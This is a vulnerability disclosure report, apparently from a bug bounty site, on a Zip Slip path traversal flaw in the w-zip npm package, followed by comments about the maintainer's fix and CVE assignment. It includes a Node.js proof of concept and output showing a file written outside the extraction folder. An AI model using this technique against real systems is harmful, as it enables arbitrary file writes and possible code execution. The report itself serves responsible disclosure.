Path Traversal in yuda-lyu/w-zip
Reported on
Oct 11th 2021
Description
w-zip is vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip).
Proof of Concept
// PoC.js
var wz = require('w-zip');
let fpUnzip = './testData/outputZip'
let fpUnzipExtract = fpUnzip + '/extract'
let fpZip1 = fpUnzip + '/zipslip.zip'
async function checkzipslip() {
//unzip
console.log('unzip1 before')
console.log('unzip1', await wz.mZip.unzip(fpZip1, fpUnzipExtract + '/zipslip'))
console.log('unzip1 after')
}
checkzipslip()
.catch((err) => {
console.log(err)
})
Execute the following commands in the terminal:
Download
1. npm i w-zip# Install affected module
2. zipslip example file can be found at - https://github.com/snyk/zip-slip-vulnerability/blob/master/archives/zip-slip.zip
3. node poc.js # Run the PoC
Output
─[user@parrot]─[~/node_modules/w-zip]
└──╼ $node poc.js
unzip1 before
unzip1 done: ./testData/outputZip/extract/zipslip
unzip1 after
┌─[user@parrot]─[~/node_modules/w-zip]
└──╼ $ls /tmp
evil.txt
Check the temp folder for the evil.txt file.
Impact
It may lead to Information Disclosure/DoS/RCE.
Occurrences
SECURITY.md
2 years ago
@admin I see the @maintainer has added a commit - https://github.com/yuda-lyu/w-zip/commit/d7039d034e02fa358e6656565157cedf5fa83288 3 days back which fixes the issue reported here. However he has not approved the issue here. Can you please look into this ??
I have dropped a message on the GitHub Issue, and 🤞 the maintainer will get back to us shortly.
@sheldor2021 - sure!
When our system does not automatically assign a CVE, we require a confirmation from the maintainer that they are happy to assign a CVE.
@yuda-lyu - are you happy for a CVE to be assigned for this report?
@yuda-lyu Can you please confirm if a CVE can be assigned